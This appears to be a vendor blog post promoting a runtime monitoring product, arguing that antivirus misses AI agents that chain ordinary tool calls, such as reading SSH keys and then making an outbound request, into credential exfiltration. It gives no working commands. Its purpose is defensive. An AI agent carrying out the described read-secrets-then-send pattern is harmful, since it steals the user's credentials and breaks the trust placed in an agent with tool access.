All posts
Architecture 2026-02-14

Why Antivirus Doesn't Stop Tool-Using Agents

Traditional antivirus software is built for a specific threat model: known malware signatures, suspicious executables, and file-based threats. It works well for what it was designed to do.

But AI agents present a fundamentally different challenge.

The agent threat model

When an AI agent runs on your machine with tool access, the "malware" isn't a binary — it's a sequence of legitimate tool calls that together create a harmful outcome:

  1. Read your SSH keys (legitimate file read)
  2. Make an outbound HTTP request (legitimate network call)
  3. The combination: credential exfiltration

Each individual action might pass antivirus checks. The risk is in the pattern and context.

What antivirus misses

  • No signature to match: The agent uses your system's own tools (curl, python, file APIs)
  • No executable to scan: The harmful behavior is a sequence of API calls, not a dropped payload
  • No file-based indicator: The threat lives in runtime behavior, not on disk

What runtime security adds

Runtime Guard monitors at the tool-use layer:

  • Every shell command the agent attempts
  • Every file read or write
  • Every outbound network connection

Actions are scored against policies. High-risk patterns (like reading secrets then making outbound requests) are blocked or flagged for approval.

This isn't a replacement for antivirus — it's a different layer for a different threat.


See how runtime monitoring works: run a demo scan or view pricing.

Try Runtime Guard

See runtime security in action or request early access.

Run demo scan Join waitlist